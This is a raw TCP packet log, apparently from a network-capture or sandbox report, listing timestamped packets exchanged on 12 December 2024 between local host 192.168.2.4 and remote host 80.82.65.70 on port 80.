                                        Dec 12, 2024 23:09:07.114698887 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.115398884 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.115443945 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.115518093 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.115565062 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.116302967 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.116348982 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.116415024 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.117741108 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.117800951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.117831945 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.117852926 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.117988110 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.118024111 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.118149996 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.118189096 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.118864059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.119046926 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.119082928 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.119667053 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.119709969 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.119779110 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.119818926 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.120595932 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.120711088 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.120748997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.121460915 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.121507883 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.121592045 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.121665955 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.122339964 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.122383118 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.122462988 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.122517109 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.224988937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.225091934 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.225150108 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.225486040 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.225526094 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.225617886 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.226286888 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.226329088 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.226389885 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.226432085 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.227144003 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.227344990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.227381945 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.228015900 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.228137970 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.228173018 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.228878975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.228935003 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.228970051 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.229720116 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.229758024 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.229851007 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.229887009 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.230546951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.230581045 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.230649948 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.231442928 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.231477022 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.231525898 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.231569052 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.232331991 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.232400894 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.232433081 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.232916117 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.233321905 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.233419895 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.233449936 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.233467102 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.234075069 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.234183073 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.234222889 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.234237909 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.234889984 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.234965086 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.235006094 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.235050917 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.235743999 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.235790968 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.235852003 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.235893965 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.236567020 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.236604929 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.236680031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.236751080 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.237459898 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.237508059 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.237572908 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.237607002 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.238370895 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.238413095 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.238449097 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.238488913 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.239249945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.239309072 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.239309072 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.239346027 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.240123987 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.240180969 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.240204096 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.240221024 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.240886927 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.240932941 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.240968943 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.241059065 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.241744041 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.241822958 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.241874933 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.241911888 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.242621899 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.242693901 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.242721081 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.242752075 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.243446112 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.243482113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.243549109 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.243588924 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.244434118 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.244555950 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.266614914 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.266654968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.266691923 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.266710997 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.266805887 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.266961098 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.266990900 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.267668962 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.267712116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.267740965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.267780066 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.268529892 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.268625975 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.268662930 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.292464972 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.292637110 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.292670965 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.292696953 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.292851925 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.292982101 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.293019056 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.293699980 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.293819904 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.293843985 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.293874979 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.294565916 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.294609070 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.294636965 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.294672966 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.295453072 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.295495987 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.295661926 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.295702934 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.296281099 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.296323061 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.296385050 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.296427011 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.297175884 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.297252893 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.297359943 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.298003912 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.298053026 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.298135996 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.298890114 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.298926115 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.298944950 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.298960924 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.299731970 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.299782038 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.299870014 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.299921036 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.300559044 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.300637960 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.300676107 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.301443100 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.301480055 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.301583052 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.301620007 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.302300930 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.302361012 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.302361965 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.302402973 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.303134918 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.303167105 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.303241968 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.303272009 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.303989887 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.304023981 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.304116011 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.304148912 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.304852009 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.304889917 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.304948092 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.304989100 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.305783033 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.305849075 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.305886030 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.306659937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.306751013 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.306790113 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.307447910 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.307548046 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.307585001 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.308386087 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.308469057 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.308516026 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.309247017 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.309433937 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.309473038 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.309987068 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.310022116 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.310092926 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.310133934 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.310843945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.310878038 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.310987949 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.311018944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.311701059 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.311732054 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.311799049 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.311829090 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.312611103 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.312704086 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.312747002 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.313441992 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.313483953 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.313539028 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.313576937 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.314268112 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.314317942 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.314347982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.314389944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.416946888 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.416999102 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.417063951 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.417149067 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.417185068 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.417215109 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.417247057 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.418018103 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.418068886 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.418163061 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.418644905 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.418893099 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.419018984 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.419059992 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.419750929 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.419795036 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.419832945 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.419874907 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.420636892 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.420680046 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.420711040 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.420754910 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.421483994 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.421531916 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.421607018 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.421879053 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.422305107 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.422341108 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.422364950 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.422394991 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.423151016 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.423191071 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.423260927 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.423304081 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.424065113 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.424119949 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.424148083 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.424220085 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.424876928 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.424926043 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.424993038 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.425429106 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.425776005 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.425817013 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.425899982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.426223993 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.426743031 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.426754951 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.426784039 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.426815987 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.427501917 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.427542925 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.427620888 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.427659988 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.428292990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.428334951 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.428462982 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.429203033 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.429214954 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.429248095 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.429265976 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.429312944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.430064917 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.430100918 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.430162907 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.430197954 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.430895090 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.430938959 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.430994987 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.431036949 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.431751966 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.431843996 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.431849957 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.431875944 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.432594061 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.432702065 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.432771921 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.433443069 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.433533907 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.433546066 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.433624029 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.434308052 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.434361935 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.434410095 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.434504986 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.435172081 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.435249090 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.435300112 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.435355902 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.436049938 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.436113119 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.436120033 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.436147928 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.458775997 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.458911896 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.458962917 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.459180117 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.459213018 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.459265947 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.459295034 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.460064888 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.460105896 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.460123062 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.460156918 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.460902929 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.464545965 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.484786987 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.484934092 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.484946012 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.485012054 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.485069990 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.485115051 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.485784054 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.485831976 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.485867023 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.485907078 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.486640930 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.486682892 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.486860037 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.486900091 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.487571001 CET804974480.82.65.70192.168.2.4
                                        Dec 12, 2024 23:09:07.487673044 CET4974480192.168.2.480.82.65.70
                                        Dec 12, 2024 23:09:07.487708092 CET804974480.82.65.70192.168.2.4
